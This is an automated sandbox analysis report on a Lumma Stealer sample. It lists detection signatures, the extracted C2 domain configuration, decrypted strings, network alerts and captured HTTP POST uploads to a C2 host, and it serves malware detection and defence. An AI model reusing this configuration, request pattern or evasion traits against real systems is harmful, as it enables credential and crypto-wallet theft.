
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1544045
MD5: e9d35001e68e949a301d6d0073be4661
SHA1: a378145e6a306b2e7c4f87508906263ab9863a76
SHA256: d500d4168637de6e15d03181eff6abdb01c45cea42bfe20562ac9496bafb3308
Tags: exe, user-Bitsight

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 5936 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E9D35001E68E949A301D6D0073BE4661)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Lumma Stealer, LummaC2 Stealer | Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["crisiwarny.store", "navygenerayk.store", "necklacedmny.store", "fadehairucw.store", "founpiuer.store", "presticitpo.store", "thumbystriw.store", "scriptyprefej.store"], "Build id": "4SD0y4--legendaryy"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
00000000.00000003.2829174271.0000000000E51000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.2909718678.0000000000E58000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: file.exe PID: 5936 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: file.exe PID: 5936 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: file.exe PID: 5936 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |
No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-28T18:43:08.002228+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49709 | 188.114.96.3 | 443 | TCP
2024-10-28T18:43:09.203893+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49711 | 188.114.96.3 | 443 | TCP
2024-10-28T18:43:08.002228+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.6 | 49709 | 188.114.96.3 | 443 | TCP
2024-10-28T18:43:09.203893+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.6 | 49711 | 188.114.96.3 | 443 | TCP
2024-10-28T18:44:58.474401+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49989 | 188.114.96.3 | 443 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: file.exe.5936.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["crisiwarny.store", "navygenerayk.store", "necklacedmny.store", "fadehairucw.store", "founpiuer.store", "presticitpo.store", "thumbystriw.store", "scriptyprefej.store"], "Build id": "4SD0y4--legendaryy"}
Source: file.exe | ReversingLabs: Detection: 42%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: 00000000.00000002.3298064964.00000000003D1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: scriptyprefej.store
Source: 00000000.00000002.3298064964.00000000003D1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: navygenerayk.store
Source: 00000000.00000002.3298064964.00000000003D1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: founpiuer.store
Source: 00000000.00000002.3298064964.00000000003D1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: necklacedmny.store
Source: 00000000.00000002.3298064964.00000000003D1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: thumbystriw.store
Source: 00000000.00000002.3298064964.00000000003D1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: fadehairucw.store
Source: 00000000.00000002.3298064964.00000000003D1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: crisiwarny.store
Source: 00000000.00000002.3298064964.00000000003D1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: presticitpo.store
Source: 00000000.00000002.3298064964.00000000003D1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.3298064964.00000000003D1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.3298064964.00000000003D1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.3298064964.00000000003D1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.3298064964.00000000003D1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000002.3298064964.00000000003D1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: 4SD0y4--legendaryy
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49972 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49987 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49989 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49991 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49992 version: TLS 1.2
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Comms
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\CEF
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\com.adobe.dunamis
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\D3DSCache
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\LocalLow\Microsoft

Networking

Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49711 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49711 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49709 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49709 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49989 -> 188.114.96.3:443
Source: Malware configuration extractor | URLs: crisiwarny.store
Source: Malware configuration extractor | URLs: navygenerayk.store
Source: Malware configuration extractor | URLs: necklacedmny.store
Source: Malware configuration extractor | URLs: fadehairucw.store
Source: Malware configuration extractor | URLs: founpiuer.store
Source: Malware configuration extractor | URLs: presticitpo.store
Source: Malware configuration extractor | URLs: thumbystriw.store
Source: Malware configuration extractor | URLs: scriptyprefej.store
Source: Joe Sandbox View | IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: necklacedmny.store
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 52 | Host: necklacedmny.store
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12864 | Host: necklacedmny.store
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15110 | Host: necklacedmny.store
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 19968 | Host: necklacedmny.store
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1199 | Host: necklacedmny.store
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: presticitpo.store
Source: global traffic | DNS traffic detected: DNS query: crisiwarny.store
Source: global traffic | DNS traffic detected: DNS query: fadehairucw.store
Source: global traffic | DNS traffic detected: DNS query: thumbystriw.store
Source: global traffic | DNS traffic detected: DNS query: necklacedmny.store
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: necklacedmny.store
Source: file.exe, 00000000.00000003.2786549341.000000000567D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.2786549341.000000000567D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: file.exe, 00000000.00000003.2786549341.000000000567D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.2786549341.000000000567D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.2786549341.000000000567D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.2786549341.000000000567D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.2786549341.000000000567D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: file.exe, 00000000.00000003.2786549341.000000000567D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.2786549341.000000000567D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: file.exe, 00000000.00000003.2786549341.000000000567D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.2786549341.000000000567D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: file.exe, 00000000.00000003.2179919901.00000000055C1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179770195.00000000055C3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179812173.00000000055C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.2787811425.0000000005593000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: file.exe, 00000000.00000003.2787811425.0000000005593000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: file.exe, 00000000.00000003.2179919901.00000000055C1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179770195.00000000055C3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179812173.00000000055C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2179919901.00000000055C1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179770195.00000000055C3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179812173.00000000055C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2179919901.00000000055C1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179770195.00000000055C3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179812173.00000000055C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.2787811425.0000000005593000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: file.exe, 00000000.00000003.2787811425.0000000005593000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000003.2179919901.00000000055C1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179770195.00000000055C3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179812173.00000000055C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2179919901.00000000055C1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179770195.00000000055C3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179812173.00000000055C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2179919901.00000000055C1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179770195.00000000055C3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179812173.00000000055C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000003.2787811425.0000000005593000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: file.exe, file.exe, 00000000.00000003.3278936830.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3049052120.0000000000E69000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3288959776.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2829174271.0000000000E51000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3289238739.0000000000E69000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3302911501.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3296964190.0000000000E69000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3049021102.0000000000E58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/
Source: file.exe, 00000000.00000002.3302911501.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3296964190.0000000000E69000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/:
Source: file.exe, 00000000.00000003.3271814012.0000000000E27000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3302799691.0000000000E43000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3302511591.0000000000E11000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3296847581.0000000000E43000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/api
Source: file.exe, 00000000.00000003.2906265983.000000000558E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/api1R
Source: file.exe, 00000000.00000003.2779545659.000000000557A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2906265983.000000000558E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2783683921.000000000557F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2785869789.000000000558B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2787512448.000000000558E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/api;m
Source: file.exe, 00000000.00000003.3271527180.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3271793739.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3049021102.0000000000E58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/apiY
Source: file.exe, 00000000.00000003.2829174271.0000000000E51000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/apid
Source: file.exe, 00000000.00000003.3297236452.0000000000E50000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3295643182.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3289149331.0000000000E51000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3279193517.0000000000E51000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3302799691.0000000000E51000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/apihmm
Source: file.exe, 00000000.00000003.3297236452.0000000000E50000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3295643182.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3302799691.0000000000E51000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/apisco
Source: file.exe, 00000000.00000003.3278936830.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/z
Source: file.exe, 00000000.00000003.3295643182.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store:443/api
Source: file.exe, 00000000.00000002.3302511591.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3295643182.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store:443/apiK
Source: file.exe, 00000000.00000003.2787543229.0000000005891000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000000.00000003.2787543229.0000000005891000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000003.2787811425.0000000005593000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: file.exe, 00000000.00000003.2179919901.00000000055C1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179770195.00000000055C3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179812173.00000000055C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.2179919901.00000000055C1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179770195.00000000055C3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179812173.00000000055C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000003.2787465347.00000000055B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.or
Source: file.exe, 00000000.00000003.2787465347.00000000055B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000003.2787543229.0000000005891000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: file.exe, 00000000.00000003.2787543229.0000000005891000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: file.exe, 00000000.00000003.2787543229.0000000005891000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.2787811425.0000000005593000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown | Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown | Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49987

              System Summary

              barindex
Source: file.exe | Static PE information: section name: (empty)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: C:\Users\user\Desktop\file.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_00E59D40 (4 entries)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_3_0558979F (4 entries)
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section (empty name): ZLIB complexity 0.9978325822884012
Source: file.exe | Static PE information: Entry point disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5, instruction diversity: 0.5
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@5/1
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers (Software Restriction Policies)
Source: file.exe, 00000000.00000003.2749157942.000000000559D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179616414.00000000055AE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2179812173.0000000005590000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2749043787.00000000055AA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string (the password_notes table of Chromium's Login Data SQLite database): CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe | ReversingLabs: Detection: 42%
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll (4 further loads)
Source: C:\Users\user\Desktop\file.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: amsi.dll
